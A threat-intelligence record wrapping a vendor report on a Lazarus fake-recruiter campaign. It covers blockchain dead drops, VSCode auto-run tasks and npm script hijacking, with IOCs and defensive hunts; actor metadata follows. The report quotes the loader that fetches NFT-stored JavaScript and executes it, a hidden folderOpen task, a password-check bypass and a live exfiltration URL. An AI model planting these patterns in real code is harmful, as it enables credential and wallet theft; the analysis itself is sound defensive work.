{
	"id": "cc43c575-cbf3-47ee-9498-68062c17d97b",
	"created_at": "2026-04-06T00:17:33.882419Z",
	"updated_at": "2026-04-10T03:38:20.196013Z",
	"deleted_at": null,
	"sha1_hash": "a3b6bbd6f3466af0804e0ff6857529171728d88a",
	"title": "Hunting Lazarus Part II: When the Dead Drop Moved to the Blockchain",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126744,
	"plain_text": "Hunting Lazarus Part II: When the Dead Drop Moved to the\r\nBlockchain\r\nBy Red Asgard Threat Research Team\r\nPublished: 2026-01-23 · Archived: 2026-04-05 18:10:10 UTC\r\nIn Part I, Red Asgard's threat research team documented the Contagious Interview campaign: 1,000 Pastebin dead\r\ndrop accounts, a timing oracle vulnerability, and a custom binary protocol on port 22411. That infrastructure was\r\nbeing disrupted—accounts taken down, IPs blocked.\r\nEleven days later, we found a new sample. Same campaign. Evolved tactics. The dead drop resolver had moved to\r\nthe blockchain.\r\nThis report documents the first documented blockchain-based dead drop resolver used by Lazarus Group:\r\nPolygon NFT contracts as payload storage. Infrastructure that literally cannot be seized.\r\nKey Findings\r\nBlockchain DDR: Polygon NFT contracts storing malicious JavaScript—immutable and globally\r\nreplicated\r\nBrand impersonation: Attackers posed as real company Betfin with functional code and Figma designs\r\n3 concurrent campaigns: Diversified infrastructure across dedicated servers, bulletproof hosting, and\r\nVercel cloud\r\nJWT vulnerability cracked: Signing secret is \"secret\" —we forged tokens and captured fresh payloads\r\n72KB stealer module: Targeting 50+ wallet extensions, 10+ password managers, 60+ browsers\r\nThe Social Engineering Playbook\r\nDuring our investigation, we obtained a firsthand account from a target—a blockchain developer contacted\r\nthrough a mutual connection. The approach followed patterns we've documented across multiple Contagious\r\nInterview incidents.\r\nThe Approach\r\nThe attack began on LinkedIn. The attackers contacted the target's friend, who connected them with a business\r\npartner. The pitch: blockchain development work with claims of $6M raised and 18 months of runway. 
The\r\ncredibility signals were deliberate: specific funding numbers, concrete timelines, and a plausible backstory.\r\nThe Interview\r\nThe first call was scheduled but the attackers claimed they could only text chat due to \"technical issues.\" The\r\ncall was rescheduled—this time they appeared with voice only, no video.\r\nhttps://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop\r\nPage 1 of 11\n\nDuring the call, they urged the target to clone the repository and run the project in realtime so they could \"walk\r\nthrough and explain everything.\" When asked to run it on their own machine with screen sharing, they declined.\r\nThe code was initially shared on Bitbucket, but the final version was delivered as a private GitHub repository.\r\nPatterns We Identified\r\nBased on this account and our analysis, we compiled the red flags present:\r\n1. Text-only then voice-only calls with \"technical issues\" excuse\r\n2. Real-time code execution request\r\n3. Refused to demo on their own machine\r\n4. Bitbucket → private GitHub migration (evasion tactic)\r\n5. Pressure to clone and run immediately\r\n6. Unsolicited outreach with urgency framing\r\nDefensive Checklist for Developers\r\nWe recommend developers verify the following before opening any code repository from an unknown source:\r\nCan you verify the company exists (LinkedIn, Crunchbase, press)?\r\nDid you initiate the contact, or did they approach you?\r\nAre they willing to do a video call?\r\nWill they demo their product on their machine first?\r\nIs the repository older than 30 days with organic commit history?\r\nHave you inspected .vscode/ , package.json , and pre-commit hooks?\r\nIf any answer is \"no,\" proceed with extreme caution.\r\nThe Blockchain Dead Drop Resolver\r\nWhy They Made the Switch\r\nA dead drop resolver (DDR) provides malware with C2 configuration without connecting directly to attacker\r\ninfrastructure. 
In Part I, we documented 1,000 Pastebin accounts used for this purpose. Those accounts were being\r\ntaken down—we found 100% of a random sample returned 404.\r\nThe blockchain changes the equation:\r\nAspect Pastebin DDR Blockchain DDR\r\nTakedown Report to Pastebin Impossible\r\nCensorship Account suspension Cannot block without breaking blockchain access\r\nReplication Single server Every Polygon node globally\r\nModification Edit paste Deploy new contract\r\nCost Free ~$0.01 per deployment\r\nTechnical Implementation\r\nThe malware uses two Polygon NFT contracts as payload storage:\r\nContract Addresses:\r\n0xad031E8d8877481337cD53E141C16A2201BB6F4d\r\n0xa80db78ff597c3D34cCAF3bdaC39f3E193595561\r\nEach contract implements a getMemo() function that returns obfuscated JavaScript:\r\nconst CONTRACT_ABI = [\r\n \"function getMemo() external view returns (string memory)\"\r\n];\r\nconst provider = new ethers.providers.JsonRpcProvider(process.env.POLYGON_RPC_URL);\r\nfor (const address of NFT_CONTRACT_ADDRESSES) {\r\n const contract = new ethers.Contract(address, CONTRACT_ABI, provider);\r\n const memo = await contract.getMemo();\r\n nftResults.push(memo);\r\n}\r\nconst payload = nftResults.join(\"\");\r\nnew Function(\"require\", payload)(require);\r\nThe new Function(\"require\", payload)(require) construct gives the fetched code full Node.js capabilities—\r\nfile system access, network operations, process spawning.\r\nWhy Blockchain?\r\n1. Cannot be seized: No server to take down, no account to suspend\r\n2. Looks legitimate: Web3 applications commonly query blockchain RPCs\r\n3. Immutable: Once deployed, the payload is permanent\r\n4. Globally replicated: Available from any Polygon RPC endpoint\r\n5. 
Easy rotation: Deploy new contract, update malware config\r\nDetection Challenges\r\nBlocking blockchain DDRs is difficult:\r\nBlocking polygon-rpc.com breaks legitimate Web3 applications\r\nContract addresses can be rotated via config update\r\nQuery traffic is HTTPS to legitimate RPC providers\r\nNo static signature—payload changes with each deployment\r\nThe Infection Chain\r\nTimeline: Folder Open to Full Compromise\r\nT+0ms: Victim opens project folder in VSCode\r\nT+50ms: VSCode parses .vscode/tasks.json\r\nT+100ms: Detects \"runOn\": \"folderOpen\" trigger\r\nT+150ms: Victim clicks \"Trust Workspace\"\r\nT+200ms: Task executes: npm install --silent --no-progress\r\nT+5s: npm install completes\r\nT+5.1s: Dependent task starts: node server/server.js\r\nT+5.3s: configureCollection() called\r\nT+5.5s: Polygon RPC query sent\r\nT+6s: Payload received from NFT contracts\r\nT+6.1s: new Function() executes payload\r\nT+6.2s: Info stealer active\r\nTotal time to compromise: ~6 seconds\r\nStage 1: VSCode Auto-Execution\r\nThe .vscode/tasks.json file is configured to execute on folder open:\r\n{\r\n \"tasks\": [{\r\n \"label\": \"run-backend\",\r\n \"command\": \"node server/server.js\",\r\n \"runOptions\": { \"runOn\": \"folderOpen\" },\r\n \"presentation\": {\r\n \"reveal\": \"never\",\r\n \"echo\": false,\r\n \"focus\": false\r\n }\r\n }]\r\n}\r\nThe \"reveal\": \"never\" setting ensures no terminal window appears.\r\nStage 2: npm Script Hijacking\r\nEvery npm script is prepended with malware execution:\r\n{\r\n \"scripts\": {\r\n \"start\": \"node server/server.js | react-scripts start\",\r\n \"build\": \"node server/server.js | react-scripts build\",\r\n \"test\": \"node server/server.js | react-scripts test\"\r\n }\r\n}\r\nThe pipe operator runs both commands in parallel. 
The React app starts normally while malware executes silently.\r\nStage 3-4: Blockchain Query → RAT Deployment\r\nThe initial payload establishes a RAT that beacons every 5 seconds. The C2 responds with a messages[] array\r\ncontaining additional modules.\r\nVM Evasion: The C2 checks MAC addresses—VirtualBox MACs ( 08:00:27:* ) are blocked. Only real\r\nhardware receives the stealer modules.\r\nStage 5: Info Stealer Active\r\nWe captured the stealer module (72KB) on 2026-01-21. Targeting scope:\r\nCrypto Wallets (50+): MetaMask, Phantom, Binance, Trust Wallet, Coinbase, Exodus, Keplr, and dozens\r\nmore\r\nPassword Managers (10+): 1Password, LastPass, Bitwarden, KeePass, DashLane\r\nBrowsers (60+): Chrome, Firefox, Brave, Edge, Safari, Tor Browser\r\nCredentials: ~/.ssh/ , ~/.aws/ , ~/.gnupg/\r\nKill Switch: If C2 returns responseCode == '-1' , all processes terminate.\r\nExfiltration target: http://87.236.177.9:3000/api/errorMessage\r\nThe Authentication Backdoor\r\nLine 39 of server/controllers/auth.js contains a subtle but critical backdoor:\r\n// Normal: const isMatch = await bcrypt.compare(password, user.password);\r\n// Actual:\r\nconst isMatch = true;\r\nImpact: Any password is accepted for any valid email address. 
If this application ever reached production,\r\nattackers would have full account access to every user.\r\nCover Story: Impersonating a Real Company\r\nUnlike typical fake company schemes, the attackers impersonated Betfin—a real cryptocurrency betting platform.\r\nThe Real Betfin\r\nBetfin is legitimate: founded in 2024, 11-50 employees, BET token on CoinMarketCap, and a LinkedIn presence.\r\nWhen victims Google \"Betfin,\" they find a real company—making social engineering significantly more effective.\r\nThe Functional Repository\r\nThe malware repository is a fully functional application:\r\nWorking Express.js backend on port 7777\r\nWebSocket-based real-time game logic\r\nReact frontend with proper routing\r\nLegitimate npm dependencies (express, socket.io, mongoose)\r\nA victim running npm start sees a real application loading—providing cover for background malware\r\nexecution.\r\nProfessional Design Assets\r\nThe attackers also shared a Figma design file (\"Betfin-Design\") with business partners:\r\n30+ high-fidelity mobile screens with consistent dark theme\r\n\"Staking\" section — matching Betfin's real product feature\r\nReferral tree diagrams — Betfin offers affiliate programs\r\nDashboard interfaces with charts and data visualizations\r\nWhy Brand Impersonation Works\r\n1. Due diligence passes — real company exists\r\n2. Token validates — CoinMarketCap listing\r\n3. Features align — staking, referrals match the real product\r\n4. 
Harder to detect — victim assumes they're joining an established project\r\nThis combination creates a social engineering package that passes most developers' vetting.\r\nCampaign Evolution: Part 1 vs Part 2\r\nAspect Part 1 (2026-01-09) Part 2 (2026-01-20)\r\nDead Drop Pastebin (1,000 accounts) Polygon blockchain\r\nPrimary C2 147.124.213.232 87.236.177.9\r\nCampaign Token hkMrMq7, kmHgMq7 env08539\r\nNovel Finding Timing oracle, Z238 protocol Blockchain DDR\r\nAnalysis: The shift to blockchain DDR suggests Pastebin accounts were being disrupted. The new C2 IP indicates\r\ninfrastructure rotation. Eleven days between samples—they're iterating quickly.\r\nNew Campaign: Vercel-Hosted C2 (31df390f0305)\r\nDuring active reconnaissance on 2026-01-21, we identified a third concurrent campaign using entirely different\r\ninfrastructure: Vercel cloud hosting.\r\nC2 Domain: codeviewer-three.vercel.app Sample: github.com/Postilize-Tech/defiguard-dev.git\r\nThis represents another evolution: legitimate cloud platforms as C2 infrastructure. 
Unlike bulletproof hosting,\r\nVercel is a mainstream platform—making blocklisting significantly more difficult.\r\nJWT Anti-Analysis (3-Minute Expiry)\r\nThe Vercel campaign implements JWT-based session tracking:\r\n{\r\n \"ip\": \"\u003cvictim_ip\u003e\",\r\n \"sessionId\": \"\u003cuuid\u003e\",\r\n \"step\": 1,\r\n \"origToken\": \"31df390f0305\",\r\n \"exp\": \"\u003cunix+180\u003e\"\r\n}\r\nIf analysts don't execute within 180 seconds, tokens expire and subsequent stages fail.\r\nCritical Finding: JWT Secret Cracked\r\nThe JWT signing secret is trivially weak: \"secret\"\r\nThis allowed us to forge valid tokens, bypass IP binding, and capture fresh payloads from all infection stages.\r\nUser-Agent Based Access Control\r\nStage 2 endpoints block analysis tools:\r\nUser-Agent Result\r\npython-requests/* 403 - Blocked\r\nWget/1.21 200 - Full payload\r\nThe malware uses wget/curl while analysis tools use Python requests—filtering most automated sandboxes.\r\nThree Concurrent Campaigns\r\nCampaign Infrastructure C2\r\nhkMrMq7 Dedicated servers (Majestic Hosting) 147.124.x.x family\r\nenv08539 Bulletproof + blockchain DDR 87.236.177.9\r\n31df390f0305 Legitimate cloud (Vercel) + JWT codeviewer-three.vercel.app\r\nThis diversification suggests operational maturity—if one infrastructure is disrupted, operations continue through\r\nothers.\r\nDefensive Recommendations\r\nCritical: VSCode Workspace Trust\r\nEnable Workspace Trust organization-wide. This is the single most effective mitigation.\r\n{\r\n \"security.workspace.trust.enabled\": true,\r\n \"security.workspace.trust.untrustedFiles\": \"prompt\"\r\n}\r\nDetection Hunts\r\n1. Audit .vscode/tasks.json for \"runOn\": \"folderOpen\"\r\nfind ~ -path \"*/.vscode/tasks.json\" -exec grep -l \"folderOpen\" {} \\;\r\n2. 
Check package.json for script hijacking patterns\r\ngrep -r \"node.*|.*react-scripts\" --include=\"package.json\"\r\n3. Block C2 IP\r\niptables -A OUTPUT -d 87.236.177.9 -j DROP\r\n4. Monitor blockchain RPC from backend servers\r\nBackend services shouldn't query Polygon unless they're Web3 applications\r\nAlert on polygon-rpc.com from non-frontend processes\r\nMITRE ATT\u0026CK Mapping\r\nID Technique Evidence\r\nT1566.003 Phishing via Service LinkedIn fake recruiter\r\nT1204.002 Malicious File VSCode auto-execution\r\nT1059.007 JavaScript All payloads\r\nT1102.001 Dead Drop Resolver Polygon NFT contracts (new variant)\r\nT1555 Credential Access Wallet/browser theft\r\nT1041 Exfiltration Over C2 HTTP POST to /api/errorMessage\r\nNew Technique Variant: T1102.001 traditionally covers web services. This sample demonstrates blockchain-based DDR—a novel application not yet reflected in ATT\u0026CK documentation.\r\nIOC Summary\r\nFile Hashes (SHA256)\r\nHash File\r\ne695f6628abade062d5a2310e16c5b2d1707795c0214b939d328e0772a776fea .vscode/tasks.json\r\n43223ce324e65b694bb8dd6bbf7992e29f75605a366532fe993bfdd924193f84 server/controllers/collection.js\r\n3e2d9bcf6ff5ae441493df87e8c46b68c12985d88152cd4ab047b236a77dd30d package.json\r\nNetwork Indicators\r\nIndicator Type Role\r\n87.236.177.9:3000 IP:Port Primary C2 (env08539)\r\ncodeviewer-three.vercel.app Domain Vercel C2 (31df390f0305)\r\n11.34.242.92 IP NEW C2 (from deobfuscation)\r\n147.124.212.125 IP Active socket C2\r\n66.235.168.238 IP Active socket C2\r\n45.59.163.55 IP Active socket C2\r\n0xad031E8d8877481337cD53E141C16A2201BB6F4d Polygon Contract DDR #1\r\n0xa80db78ff597c3D34cCAF3bdaC39f3E193595561 Polygon Contract DDR #2\r\nCampaign Tokens\r\nToken Purpose\r\n31df390f0305 Vercel campaign (defiguard-dev)\r\nenv08539 
EuroHoster campaign\r\nhkMrMq7 Majestic Hosting campaign\r\nkmHgMq7 Secondary campaign\r\nA Practitioner's Perspective\r\nThe blockchain DDR represents a meaningful evolution in C2 resilience. When Pastebin accounts get taken down,\r\noperators need alternatives. When those alternatives include infrastructure that cannot be seized, defenders have\r\nfewer options.\r\nThis doesn't make detection impossible—monitoring for blockchain library usage in unexpected contexts is still\r\neffective. But it does raise the bar for disruption.\r\nFor organizations: if you're hiring crypto developers through Upwork, Fiverr, or similar platforms, you're in the\r\ntarget zone. Vet repositories before opening them. Disable VSCode auto-run tasks. Review package.json scripts\r\nbefore running npm install .\r\nFor threat hunters: the blockchain DDR provides immediate detection opportunities—monitor for ethers.js or\r\nWeb3 library usage in applications without blockchain functionality, and alert on Polygon RPC queries from\r\nbackend servers. 
The brand impersonation angle also offers investigative leads: cross-reference recruitment\r\noutreach against legitimate company employee directories.\r\nHow Red Asgard Can Help\r\nThis investigation originated from our freelancer code vetting practice—a service we offer to organizations that\r\noutsource development work.\r\nContractor Code Review\r\nRepository analysis before code integration\r\nMalware and backdoor detection\r\nSupply chain risk assessment\r\nFreelancer background verification\r\nThreat Intelligence\r\nAPT campaign tracking (Lazarus, Kimsuky, APT41)\r\nIOC feeds and alerting\r\nCustom threat hunting\r\nIncident response support\r\nSecurity Assessments\r\nApplication security testing\r\nInfrastructure penetration testing\r\nAI/ML security review\r\nRed team engagements\r\nIf you're outsourcing development work—especially in crypto or Web3—we'd welcome the opportunity to discuss\r\nyour security posture.\r\nContact: contact@redasgard.com\r\nReferences\r\nPart I: Hunting Lazarus: Inside the Contagious Interview C2 Infrastructure\r\nSentinelOne: Contagious Interview\r\nSekoia: ClickFake Interview Campaign\r\nMITRE ATT\u0026CK: Contagious Interview (G1052)\r\nSource: https://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://redasgard.com/blog/hunting-lazarus-part2-blockchain-dead-drop"
	],
	"report_names": [
		"hunting-lazarus-part2-blockchain-dead-drop"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
